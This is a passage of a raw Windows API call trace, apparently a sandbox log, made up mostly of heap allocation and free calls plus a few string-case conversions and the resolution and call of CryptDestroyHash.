dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.077] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.077] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.077] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.078] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.078] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.078] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.079] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.079] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0265.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.081] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0265.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.081] CryptDestroyHash (hHash=0xaa5760) returned 1 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0265.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 